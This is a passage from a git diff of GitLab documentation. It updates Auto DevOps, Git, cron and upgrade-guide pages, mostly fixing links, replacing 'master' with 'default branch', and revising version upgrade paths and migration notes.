`master` include this stage with a `dast_environment_deploy` job. +- **Review** - Pipelines on the default branch include this stage with a `dast_environment_deploy` job. To learn more, see [Dynamic Application Security Testing (DAST)](../../user/application_security/dast/index.md). - **Production** - After the tests and checks finish, the application deploys in @@ -208,7 +208,7 @@ The jobs are separated into stages: - **Performance** - Performance tests are run on the deployed application ([Auto Browser Performance Testing](stages.md#auto-browser-performance-testing)). **(PREMIUM)** -- **Cleanup** - Pipelines on `master` include this stage with a `stop_dast_environment` job. +- **Cleanup** - Pipelines on the default branch include this stage with a `stop_dast_environment` job. After running a pipeline, you should view your deployed website and learn how to monitor it. @@ -267,7 +267,7 @@ you should next create a feature branch to add content to your application: After submitting the merge request, GitLab runs your pipeline, and all the jobs in it, as [described previously](#deploy-the-application), in addition to -a few more that run only on branches other than `master`. +a few more that run only on branches other than the default branch.  @@ -303,7 +303,7 @@ the **View app** **{external-link}** button to see your changes deployed.  -After merging the merge request, GitLab runs the pipeline on the `master` branch, +After merging the merge request, GitLab runs the pipeline on the default branch, and then deploys the application to production. ## Conclusion @@ -314,7 +314,7 @@ all in GitLab. Despite its automatic nature, Auto DevOps can also be configured and customized to fit your workflow. Here are some helpful resources for further reading: 1. [Auto DevOps](index.md) -1. [Multiple Kubernetes clusters](index.md#using-multiple-kubernetes-clusters) +1. [Multiple Kubernetes clusters](index.md#use-multiple-kubernetes-clusters) 1. [Incremental rollout to production](customize.md#incremental-rollout-to-production) **(PREMIUM)** 1. [Disable jobs you don't need with CI/CD variables](customize.md#cicd-variables) 1. [Use your own buildpacks to build your application](customize.md#custom-buildpacks) diff --git a/doc/topics/autodevops/requirements.md b/doc/topics/autodevops/requirements.md index 7e59ecb4916..9c330aede17 100644 --- a/doc/topics/autodevops/requirements.md +++ b/doc/topics/autodevops/requirements.md @@ -62,7 +62,7 @@ To make full use of Auto DevOps with Kubernetes, you need: The runners don't need to be installed in the Kubernetes cluster, but the Kubernetes executor is easy to use and automatically autoscales. You can configure Docker-based runners to autoscale as well, using - [Docker Machine](https://docs.gitlab.com/runner/install/autoscaling.html). + [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html). Runners should be registered as [shared runners](../../ci/runners/runners_scope.md#shared-runners) for the entire GitLab instance, or [specific runners](../../ci/runners/runners_scope.md#specific-runners) @@ -125,7 +125,7 @@ only the deployment to Kubernetes runs. WARNING: Setting the `AUTO_DEVOPS_PLATFORM_TARGET` variable to `ECS` triggers jobs defined in the [`Jobs/Deploy/ECS.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy/ECS.gitlab-ci.yml). -However, it's not recommended to [include](../../ci/yaml/README.md#includetemplate) +However, it's not recommended to [include](../../ci/yaml/index.md#includetemplate) it on its own. This template is designed to be used with Auto DevOps only. It may change unexpectedly causing your pipeline to fail if included on its own. Also, the job names within this template may also change. Do not override these jobs' names in your diff --git a/doc/topics/autodevops/stages.md b/doc/topics/autodevops/stages.md index d3f217d3749..f689183d556 100644 --- a/doc/topics/autodevops/stages.md +++ b/doc/topics/autodevops/stages.md @@ -250,7 +250,7 @@ such as after merging a merge request, the Review App is also deleted. Review apps are deployed using the [auto-deploy-app](https://gitlab.com/gitlab-org/cluster-integration/auto-deploy-image/-/tree/master/assets/auto-deploy-app) chart with Helm, which you can [customize](customize.md#custom-helm-chart). The application deploys -into the [Kubernetes namespace](../../user/project/clusters/index.md#deployment-variables) +into the [Kubernetes namespace](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) for the environment. In GitLab 11.4 and later, [local Tiller](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22036) is @@ -350,8 +350,7 @@ Any load performance test result differences between the source and target branc Auto Deploy is an optional step for Auto DevOps. If the [requirements](requirements.md) are not met, the job is skipped. -After a branch or merge request is merged into the project's default branch (usually -`master`), Auto Deploy deploys the application to a `production` environment in +After a branch or merge request is merged into the project's default branch, Auto Deploy deploys the application to a `production` environment in the Kubernetes cluster, with a namespace based on the project name and unique project ID, such as `project-4321`. @@ -367,7 +366,7 @@ commands. This is an easy way to Helm uses the [auto-deploy-app](https://gitlab.com/gitlab-org/cluster-integration/auto-deploy-image/-/tree/master/assets/auto-deploy-app) chart to deploy the application into the -[Kubernetes namespace](../../user/project/clusters/index.md#deployment-variables) +[Kubernetes namespace](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) for the environment. In GitLab 11.4 and later, a @@ -542,7 +541,7 @@ You must use a Kubernetes network plugin that implements support for `NetworkPolicy`. The default network plugin for Kubernetes (`kubenet`) [does not implement](https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/network-plugins/#kubenet) support for it. The [Cilium](https://cilium.io/) network plugin can be -installed as a [cluster application](../../user/clusters/applications.md#install-cilium-using-gitlab-cicd) +installed as a [cluster application](../../user/project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium) to enable support for network policies. You can enable deployment of a network policy by setting the following @@ -578,7 +577,7 @@ networkPolicy: ``` For more information on installing Network Policies, see -[Install Cilium using GitLab CI/CD](../../user/clusters/applications.md#install-cilium-using-gitlab-cicd). +[Use the Cluster Management Template to Install Cilium](../../user/project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium). ### Cilium Network Policy @@ -597,7 +596,7 @@ As the default network plugin for Kubernetes (`kubenet`) support for it, you must have [Cilium](https://docs.cilium.io/en/v1.8/intro/) as your Kubernetes network plugin. The [Cilium](https://cilium.io/) network plugin can be -installed as a [cluster application](../../user/clusters/applications.md#install-cilium-using-gitlab-cicd) +installed with a [cluster management project template](../../user/project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium) to enable support for network policies. #### Configuration @@ -644,11 +643,10 @@ ciliumNetworkPolicy: enabled: true alerts: enabled: true - ``` For more information on installing Network Policies, see -[Install Cilium using GitLab CI/CD](../../user/clusters/applications.md#install-cilium-using-gitlab-cicd). +[Use the Cluster Management Template to Install Cilium](../../user/project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium). ### Running commands in the container diff --git a/doc/topics/autodevops/troubleshooting.md b/doc/topics/autodevops/troubleshooting.md index cf2a2133fa3..cee4ba68b49 100644 --- a/doc/topics/autodevops/troubleshooting.md +++ b/doc/topics/autodevops/troubleshooting.md @@ -49,7 +49,7 @@ To fix this issue, you must either: Auto Deploy fails if GitLab can't create a Kubernetes namespace and service account for your project. For help debugging this issue, see -[Troubleshooting failed deployment jobs](../../user/project/clusters/index.md#troubleshooting). +[Troubleshooting failed deployment jobs](../../user/project/clusters/deploy_to_cluster.md#troubleshooting). ## Detected an existing PostgreSQL database diff --git a/doc/topics/autodevops/upgrading_auto_deploy_dependencies.md b/doc/topics/autodevops/upgrading_auto_deploy_dependencies.md index 48d37e5125c..4cf699ce25a 100644 --- a/doc/topics/autodevops/upgrading_auto_deploy_dependencies.md +++ b/doc/topics/autodevops/upgrading_auto_deploy_dependencies.md @@ -1,6 +1,6 @@ --- -stage: Release -group: Release +stage: Configure +group: Configure info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments type: reference --- @@ -31,11 +31,11 @@ are using. First verify which template is in use: - [The GitLab.com stable Auto Deploy template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy.gitlab-ci.yml) is being used if **one** of the following is true: - Your Auto DevOps project doesn't have a `.gitlab-ci.yml` file. - - Your Auto DevOps project has a `.gitlab-ci.yml` and [includes](../../ci/yaml/README.md#includetemplate) + - Your Auto DevOps project has a `.gitlab-ci.yml` and [includes](../../ci/yaml/index.md#includetemplate) the `Auto-DevOps.gitlab-ci.yml` template. - [The latest Auto Deploy template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Deploy.latest.gitlab-ci.yml) is being used if **both** of the following is true: - - Your Auto DevOps project has a `.gitlab-ci.yml` file and [includes](../../ci/yaml/README.md#includetemplate) + - Your Auto DevOps project has a `.gitlab-ci.yml` file and [includes](../../ci/yaml/index.md#includetemplate) the `Auto-DevOps.gitlab-ci.yml` template. - It also includes [the latest Auto Deploy template](#early-adopters) diff --git a/doc/topics/autodevops/upgrading_postgresql.md b/doc/topics/autodevops/upgrading_postgresql.md index 35b9d2e055c..c03c4171d6d 100644 --- a/doc/topics/autodevops/upgrading_postgresql.md +++ b/doc/topics/autodevops/upgrading_postgresql.md @@ -195,7 +195,7 @@ higher*. This is the remove the variables, or rename the variables temporarily to `XDB_INITIALIZE` or the `XDB_MIGRATE` to effectively disable them. 1. Run a new CI pipeline for the branch. In this case, we run a new CI - pipeline for `master`. + pipeline for `main`. 1. After the pipeline is successful, your application is upgraded with the new PostgreSQL installed. Zero replicas exist at this time, so no traffic is served for your application (to prevent @@ -250,5 +250,5 @@ steps to reinstate your application: removed or disabled. 1. Restore the `PRODUCTION_REPLICAS` or `REPLICAS` variable to its original value. 1. Run a new CI pipeline for the branch. In this case, we run a new CI - pipeline for `master`. After the pipeline is successful, your + pipeline for `main`. After the pipeline is successful, your application should be serving traffic as before. diff --git a/doc/topics/build_your_application.md b/doc/topics/build_your_application.md index d084ecec435..150e0ec26e4 100644 --- a/doc/topics/build_your_application.md +++ b/doc/topics/build_your_application.md @@ -11,6 +11,6 @@ code, and use CI/CD to generate your application. Include packages in your app a - [Repositories](../user/project/repository/index.md) - [Merge requests](../user/project/merge_requests/index.md) -- [CI/CD](../ci/README.md) +- [CI/CD](../ci/index.md) - [Packages & Registries](../user/packages/index.md) - [Application infrastructure](../user/project/clusters/index.md) diff --git a/doc/topics/cron/index.md b/doc/topics/cron/index.md index 88f8bd1858f..f7a22bef07c 100644 --- a/doc/topics/cron/index.md +++ b/doc/topics/cron/index.md @@ -9,7 +9,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w Cron syntax is used to schedule when jobs should run. You may need to use a cron syntax string to -[trigger nightly pipelines](../../ci/triggers/README.md#using-cron-to-trigger-nightly-pipelines), +[trigger nightly pipelines](../../ci/triggers/index.md#using-cron-to-trigger-nightly-pipelines), create a [pipeline schedule](../../api/pipeline_schedules.md#create-a-new-pipeline-schedule), or to prevent unintentional releases by setting a [deploy freeze](../../user/project/releases/index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). @@ -52,7 +52,7 @@ terminal. # Run at 7:00pm every day: 0 19 * * * -# Run every minute on the 10th of June: +# Run every minute on the 3rd of June: * * 3 6 * # Run at 06:30 every Friday: diff --git a/doc/topics/git/how_to_install_git/index.md b/doc/topics/git/how_to_install_git/index.md index 8b097c4c1da..fc9c0e0ec63 100644 --- a/doc/topics/git/how_to_install_git/index.md +++ b/doc/topics/git/how_to_install_git/index.md @@ -62,7 +62,7 @@ To verify that Git works on your system, run: git --version ``` -Next, read our article on [adding an SSH key to GitLab](../../../ssh/README.md). +Next, read our article on [adding an SSH key to GitLab](../../../ssh/index.md). ## Install Git on Ubuntu Linux @@ -86,13 +86,13 @@ To verify that Git works on your system, run: git --version ``` -Next, read our article on [adding an SSH key to GitLab](../../../ssh/README.md). +Next, read our article on [adding an SSH key to GitLab](../../../ssh/index.md). ## Installing Git on Windows from the Git website Open the [Git website](https://git-scm.com/) and download and install Git for Windows. -Next, read our article on [adding an SSH key to GitLab](../../../ssh/README.md). +Next, read our article on [adding an SSH key to GitLab](../../../ssh/index.md). <!-- ## Troubleshooting diff --git a/doc/topics/git/index.md b/doc/topics/git/index.md index 21775044301..c1e766a7c48 100644 --- a/doc/topics/git/index.md +++ b/doc/topics/git/index.md @@ -14,7 +14,7 @@ large projects with speed and efficiency. [GitLab](https://about.gitlab.com) is a Git-based fully integrated platform for software development. Besides Git's functionalities, GitLab has a lot of powerful [features](https://about.gitlab.com/features/) to enhance your -[workflow](https://about.gitlab.com/topics/version-control/what-is-gitlab-workflow/). +[workflow](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/). We've gathered some resources to help you to get the best from Git with GitLab. diff --git a/doc/topics/git/lfs/index.md b/doc/topics/git/lfs/index.md index dfb175cbb82..32039548475 100644 --- a/doc/topics/git/lfs/index.md +++ b/doc/topics/git/lfs/index.md @@ -275,46 +275,3 @@ You might choose to do this if you are using an appliance like a <!-- vale gitla GitLab can't verify LFS objects. Pushes then fail if you have GitLab LFS support enabled. To stop push failure, LFS support can be disabled in the [Project settings](../../../user/project/settings/index.md), which also disables GitLab LFS value-adds (Verifying LFS objects, UI integration for LFS). - -### Missing LFS objects - -An error about a missing LFS object may occur in either of these situations: - -- When migrating LFS objects from disk to object storage, with error messages like: - - ```plaintext - ERROR -- : Failed to transfer LFS object - 006622269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 - with error: No such file or directory @ rb_sysopen - - /var/opt/gitlab/gitlab-rails/shared/lfs-objects/00/66/22269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 - ``` - - (Line breaks have been added for legibility.) - -- When running the - [integrity check for LFS objects](../../../administration/raketasks/check.md#uploaded-files-integrity) - with the `VERBOSE=1` parameter. - -The database can have records for LFS objects which are not on disk. The database entry may -[prevent a new copy of the object being pushed](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49241). -To delete these references: - -1. [Start a rails console](../../../administration/operations/rails_console.md). -1. Query the object that's reported as missing in the rails console, to return a file path: - - ```ruby - lfs_object = LfsObject.find_by(oid: '006622269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7') - lfs_object.file.path - ``` - -1. Check on disk if it exists: - - ```shell - ls -al /var/opt/gitlab/gitlab-rails/shared/lfs-objects/00/66/22269c61b41bf14a22bbe0e43be3acf86a4a446afb4250c3794ea47541a7 - ``` - -1. If the file is not present, remove the database record via the rails console: - - ```ruby - lfs_object.destroy - ``` diff --git a/doc/topics/git/numerous_undo_possibilities_in_git/img/rebase_reset.png b/doc/topics/git/numerous_undo_possibilities_in_git/img/rebase_reset.png Binary files differindex c1a67e0b566..299a72ee24f 100644 --- a/doc/topics/git/numerous_undo_possibilities_in_git/img/rebase_reset.png +++ b/doc/topics/git/numerous_undo_possibilities_in_git/img/rebase_reset.png diff --git a/doc/topics/git/numerous_undo_possibilities_in_git/img/revert.png b/doc/topics/git/numerous_undo_possibilities_in_git/img/revert.png Binary files differindex 0732a73278b..d31fa0ceb88 100644 --- a/doc/topics/git/numerous_undo_possibilities_in_git/img/revert.png +++ b/doc/topics/git/numerous_undo_possibilities_in_git/img/revert.png diff --git a/doc/topics/git/numerous_undo_possibilities_in_git/index.md b/doc/topics/git/numerous_undo_possibilities_in_git/index.md index 6de62897041..4d58c7ab455 100644 --- a/doc/topics/git/numerous_undo_possibilities_in_git/index.md +++ b/doc/topics/git/numerous_undo_possibilities_in_git/index.md @@ -249,7 +249,7 @@ commits `A-B-C-D` and you want to modify something introduced in commit `B`. ``` A list of commits is displayed in your editor. - + 1. In front of commit `B`, replace `pick` with `edit`. 1. Leave the default, `pick`, for all other commits. 1. Save and exit the editor. diff --git a/doc/topics/git/troubleshooting_git.md b/doc/topics/git/troubleshooting_git.md index 8db683f6291..cc2631c9445 100644 --- a/doc/topics/git/troubleshooting_git.md +++ b/doc/topics/git/troubleshooting_git.md @@ -45,7 +45,7 @@ set to 50MB. The default is 1MB. **If pushing over SSH**, first check your SSH configuration as 'Broken pipe' errors can sometimes be caused by underlying issues with SSH (such as authentication). Make sure that SSH is correctly configured by following the -instructions in the [SSH troubleshooting](../../ssh/README.md#troubleshooting-ssh-connections) documentation. +instructions in the [SSH troubleshooting](../../ssh/index.md#troubleshooting-ssh-connections) documentation. If you're a GitLab administrator with server access, you can also prevent session timeouts by configuring SSH `keep-alive` on the client or the server. diff --git a/doc/topics/gitlab_flow.md b/doc/topics/gitlab_flow.md index df5029bb0d1..d9aff6c35e5 100644 --- a/doc/topics/gitlab_flow.md +++ b/doc/topics/gitlab_flow.md @@ -152,7 +152,7 @@ After the assigned person feels comfortable with the result, they can merge the If the assigned person does not feel comfortable, they can request more changes or close the merge request without merging. In GitLab, it is common to protect the long-lived branches, such as the `main` branch, so [most developers can't modify them](../user/permissions.md). -So, if you want to merge into a protected branch, assign your merge request to someone with the +So, if you want to merge into a protected branch, assign your merge request to someone with the [Maintainer role](../user/permissions.md). After you merge a feature branch, you should remove it from the source control software. diff --git a/doc/topics/index.md b/doc/topics/index.md index 565b436c0b0..fde420c64f6 100644 --- a/doc/topics/index.md +++ b/doc/topics/index.md @@ -15,7 +15,7 @@ tutorials, technical overviews, blog posts) and videos. - [Auto DevOps](autodevops/index.md) - [Authentication](authentication/index.md) -- [Continuous Integration (GitLab CI/CD)](../ci/README.md) +- [Continuous Integration (GitLab CI/CD)](../ci/index.md) - [Cron](cron/index.md) - [Git](git/index.md) - [GitLab Flow](gitlab_flow.md) diff --git a/doc/topics/set_up_organization.md b/doc/topics/set_up_organization.md index d8b1ab59b9e..3758435d297 100644 --- a/doc/topics/set_up_organization.md +++ b/doc/topics/set_up_organization.md @@ -1,6 +1,6 @@ --- -stage: -group: +stage: +group: info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- @@ -10,7 +10,8 @@ Configure your organization and its users. Determine user roles and give everyone access to the projects they need. - [Members](../user/project/members/index.md) +- [Workspace](../user/workspace/index.md) _(Coming soon)_ - [Groups](../user/group/index.md) - [User account options](../user/profile/index.md) -- [SSH keys](../ssh/README.md) +- [SSH keys](../ssh/index.md) - [GitLab.com settings](../user/gitlab_com/index.md) diff --git a/doc/university/README.md b/doc/university/README.md deleted file mode 100644 index 573daab2333..00000000000 --- a/doc/university/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../topics/index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](../topics/index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/university/training/gitlab_flow.md b/doc/university/training/gitlab_flow.md deleted file mode 100644 index d38e39fcfe2..00000000000 --- a/doc/university/training/gitlab_flow.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../topics/gitlab_flow.md' -remove_date: '2021-05-16' ---- - -This document was moved to [another location](../../topics/gitlab_flow.md). - -<!-- This redirect file can be deleted after <2021-05-16>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/university/training/topics/cherry_picking.md b/doc/university/training/topics/cherry_picking.md deleted file mode 100644 index 3e278b2c199..00000000000 --- a/doc/university/training/topics/cherry_picking.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../../topics/git/cherry_picking.md' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](../../../topics/git/cherry_picking.md). - -<!-- This redirect file can be deleted after <2021-06-01>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/university/training/topics/tags.md b/doc/university/training/topics/tags.md deleted file mode 100644 index 53250e3540a..00000000000 --- a/doc/university/training/topics/tags.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../../topics/git/tags.md' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](../../../topics/git/tags.md). - -<!-- This redirect file can be deleted after <2021-06-01>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/update/README.md b/doc/update/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/update/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/update/index.md b/doc/update/index.md index 2ac22631289..7875510167e 100644 --- a/doc/update/index.md +++ b/doc/update/index.md @@ -109,7 +109,9 @@ Sidekiq::ScheduledSet.new.select { |r| r.klass == 'BackgroundMigrationWorker' }. ### Batched background migrations -See the documentation on [batched background migrations](../user/admin_area/monitoring/background_migrations.md). +Batched background migrations need to finish before you update to a newer version. + +Read more about [batched background migrations](../user/admin_area/monitoring/background_migrations.md). ### What do I do if my background migrations are stuck? @@ -186,44 +188,44 @@ migration](../integration/elasticsearch.md#retry-a-halted-migration). ## Upgrade paths -You can generally upgrade through multiple GitLab versions in one go, -although this is discouraged for [zero downtime upgrades](#upgrading-without-downtime) and -sometimes this can cause issues. +Upgrading across multiple GitLab versions in one go is *only possible with downtime*. +The following examples assume a downtime upgrade. +See the section below for [zero downtime upgrades](#upgrading-without-downtime). Find where your version sits in the upgrade path below, and upgrade GitLab accordingly, while also consulting the [version-specific upgrade instructions](#version-specific-upgrading-instructions): -`8.11.Z` -> `8.12.0` -> `8.17.7` -> `9.5.10` -> `10.8.7` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.10.14` -> `13.0.14` -> `13.1.11` -> [latest `13.12.Z`](https://about.gitlab.com/releases/categories/releases/) -> [latest `14.0.Z`](https://about.gitlab.com/releases/categories/releases/) +`8.11.Z` -> [`8.12.0`](#upgrades-from-versions-earlier-than-812) -> `8.17.7` -> `9.5.10` -> `10.8.7` -> [`11.11.8`](#1200) -> `12.0.12` -> [`12.1.17`](#1210) -> `12.10.14` -> `13.0.14` -> [`13.1.11`](#1310) -> [latest `13.12.Z`](https://about.gitlab.com/releases/categories/releases/) -> [latest `14.0.Z`](#1400) -> [`14.1.Z`](#1410) -> [latest `14.Y.Z`](https://about.gitlab.com/releases/categories/releases/) The following table, while not exhaustive, shows some examples of the supported upgrade paths. | Target version | Your version | Supported upgrade path | Note | | --------------------- | ------------ | ------------------------ | ---- | -| `13.5.4` | `12.9.2` | `12.9.2` -> `12.10.14` -> `13.0.14` -> `13.1.11` -> `13.5.4` | Three intermediate versions are required: the final `12.10` release, plus `13.0` and `13.1`. | -| `13.2.10` | `11.5.0` | `11.5.0` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.10.14` -> `13.0.14` -> `13.1.11` -> `13.2.10` | Six intermediate versions are required: the final `11.11`, `12.0`, `12.1`, `12.10`, `13.0` releases, plus `13.1`. | -| `12.10.14` | `11.3.4` | `11.3.4` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.10.14` | Three intermediate versions are required: the final `11.11` and `12.0` releases, plus `12.1` | -| `12.9.5` | `10.4.5` | `10.4.5` -> `10.8.7` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.9.5` | Four intermediate versions are required: `10.8`, `11.11`, `12.0` and `12.1`, then `12.9.5` | -| `12.2.5` | `9.2.6` | `9.2.6` -> `9.5.10` -> `10.8.7` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.2.5` | Five intermediate versions are required: `9.5`, `10.8`, `11.11`, `12.0`, `12.1`, then `12.2`. | +| `14.1.0` | `13.9.2` | `13.9.2` -> `13.12.6` -> `14.0.5` -> `14.1.0` | Two intermediate versions are required: `13.12` and `14.0`, then `14.1`. | +| `13.5.4` | `12.9.2` | `12.9.2` -> `12.10.14` -> `13.0.14` -> `13.1.11` -> `13.5.4` | Three intermediate versions are required: `12.10`, `13.0` and `13.1`, then `13.5.4`. | +| `13.2.10` | `11.5.0` | `11.5.0` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.10.14` -> `13.0.14` -> `13.1.11` -> `13.2.10` | Six intermediate versions are required: `11.11`, `12.0`, `12.1`, `12.10`, `13.0` and `13.1`, then `13.2.10`. | +| `12.10.14` | `11.3.4` | `11.3.4` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.10.14` | Three intermediate versions are required: `11.11`, `12.0` and `12.1`, then `12.10.14`. | +| `12.9.5` | `10.4.5` | `10.4.5` -> `10.8.7` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.9.5` | Four intermediate versions are required: `10.8`, `11.11`, `12.0` and `12.1`, then `12.9.5`. | +| `12.2.5` | `9.2.6` | `9.2.6` -> `9.5.10` -> `10.8.7` -> `11.11.8` -> `12.0.12` -> `12.1.17` -> `12.2.5` | Five intermediate versions are required: `9.5`, `10.8`, `11.11`, `12.0`, `12.1`, then `12.2.5`. | | `11.3.4` | `8.13.4` | `8.13.4` -> `8.17.7` -> `9.5.10` -> `10.8.7` -> `11.3.4` | `8.17.7` is the last version in version 8, `9.5.10` is the last version in version 9, `10.8.7` is the last version in version 10. | ## Upgrading to a new major version Upgrading the *major* version requires more attention. Backward-incompatible changes and migrations are reserved for major versions. -We cannot guarantee that upgrading between major versions will be seamless. -It is suggested to upgrade to the latest available *minor* version within -your major version before proceeding to the next major version. -Doing this addresses any backward-incompatible changes or deprecations -to help ensure a successful upgrade to the next major release. -Identify a [supported upgrade path](#upgrade-paths). +Follow the directions carefully as we +cannot guarantee that upgrading between major versions will be seamless. -More significant migrations may occur during major release upgrades. To ensure these are successful: +It is required to follow the following upgrade steps to ensure a successful *major* version upgrade: -1. Increment to the first minor version (`X.0.Z`) during the major version jump. +1. Upgrade to the latest minor version of the preceeding major version. +1. Upgrade to the first minor version (`X.0.Z`) of the target major version. 1. Proceed with upgrading to a newer release. +Identify a [supported upgrade path](#upgrade-paths). + It's also important to ensure that any background migrations have been fully completed before upgrading to a new major version. To see the current size of the `background_migration` queue, [Check for background migrations before upgrading](#checking-for-background-migrations-before-upgrading). @@ -369,15 +371,54 @@ NOTE: Specific information that follow related to Ruby and Git versions do not apply to [Omnibus installations](https://docs.gitlab.com/omnibus/) and [Helm Chart deployments](https://docs.gitlab.com/charts/). They come with appropriate Ruby and Git versions and are not using system binaries for Ruby and Git. There is no need to install Ruby or Git when utilizing these two approaches. +### 14.1.0 + +- Due to an issue where `BatchedBackgroundMigrationWorkers` were + [not working](https://gitlab.com/gitlab-org/charts/gitlab/-/issues/2785#note_614738345) + for self-managed instances, a [fix was created](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/65106) + and a [14.0.Z](#1400) version was released. If you haven't udpated to 14.0.Z, you need + to update to at least 14.1.0 that contains the same fix before you update to + a later version. + + After you update to 14.1.0, + [batched background migrations need to finish](../user/admin_area/monitoring/background_migrations.md#check-the-status-of-background-migrations) + before you update to a later version. + + If the migrations are not finished and you try to update to a later version, + you'll see an error like: + + ```plaintext + Expected batched background migration for the given configuration to be marked as 'finished', but it is 'active': + ``` + + See how to [resolve this error](../user/admin_area/monitoring/background_migrations.md#database-migrations-failing-because-of-batched-background-migration-not-finished). + ### 14.0.0 -In GitLab 13.3 some [pipeline processing methods were deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/218536) -and this code was completely removed in GitLab 14.0. If you plan to upgrade from -**GitLab 13.2 or older** directly to 14.0, you should not have any pipelines running -when you upgrade. The pipelines might report the wrong status when the upgrade completes. -You should shut down GitLab and wait for all pipelines on runners to complete, then upgrade -GitLab to 14.0. Alternatively, you can first upgrade GitLab to a version between 13.3 and -13.12, then upgrade to 14.0. +- Due to an issue where `BatchedBackgroundMigrationWorkers` were + [not working](https://gitlab.com/gitlab-org/charts/gitlab/-/issues/2785#note_614738345) + for self-managed instances, a [fix was created](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/65106) + that requires an update to at least 14.0.5. + + After you update to 14.0.5 or a later 14.0 patch version, + [batched background migrations need to finish](../user/admin_area/monitoring/background_migrations.md#check-the-status-of-background-migrations) + before you update to a later version. + + If the migrations are not finished and you try to update to a later version, + you'll see an error like: + + ```plaintext + Expected batched background migration for the given configuration to be marked as 'finished', but it is 'active': + ``` + + See how to [resolve this error](../user/admin_area/monitoring/background_migrations.md#database-migrations-failing-because-of-batched-background-migration-not-finished). + +- In GitLab 13.3 some [pipeline processing methods were deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/218536) + and this code was completely removed in GitLab 14.0. If you plan to upgrade from + **GitLab 13.2 or older** directly to 14.0 ([unsupported](#upgrading-to-a-new-major-version)), you should not have any pipelines running + when you upgrade or the pipelines might report the wrong status when the upgrade completes. + You should instead follow a [supported upgrade path](#upgrade-paths). +- The support of PostgreSQL 11 [has been dropped](../install/requirements.md#database). Make sure to [update your database](https://docs.gitlab.com/omnibus/settings/database.html#upgrade-packaged-postgresql-server) to version 12 before updating to GitLab 14.0. ### 13.11.0 @@ -387,9 +428,8 @@ Git 2.31.x and later is required. We recommend you use the ### 13.9.0 We've detected an issue [with a column rename](https://gitlab.com/gitlab-org/gitlab/-/issues/324160) -that may prevent upgrades to GitLab 13.9.0, 13.9.1, 13.9.2 and 13.9.3. -We are working on a patch, but until a fixed version is released, you can manually complete -the zero-downtime upgrade: +that will prevent upgrades to GitLab 13.9.0, 13.9.1, 13.9.2 and 13.9.3 when following the zero-downtime steps. It is necessary +to perform the following additional steps for the zero-downtime upgrade: 1. Before running the final `sudo gitlab-rake db:migrate` command on the deploy node, execute the following queries using the PostgreSQL console (or `sudo gitlab-psql`) @@ -409,9 +449,18 @@ the zero-downtime upgrade: ``` If you have already run the final `sudo gitlab-rake db:migrate` command on the deploy node and have -encountered the [column rename issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160), you can still -follow the previous steps to complete the update. +encountered the [column rename issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160), you will +see the following error: + +```shell +-- remove_column(:application_settings, :asset_proxy_whitelist) +rake aborted! +StandardError: An error has occurred, all later migrations canceled: +PG::DependentObjectsStillExist: ERROR: cannot drop column asset_proxy_whitelist of table application_settings because other objects depend on it +DETAIL: trigger trigger_0d588df444c8 on table application_settings depends on column 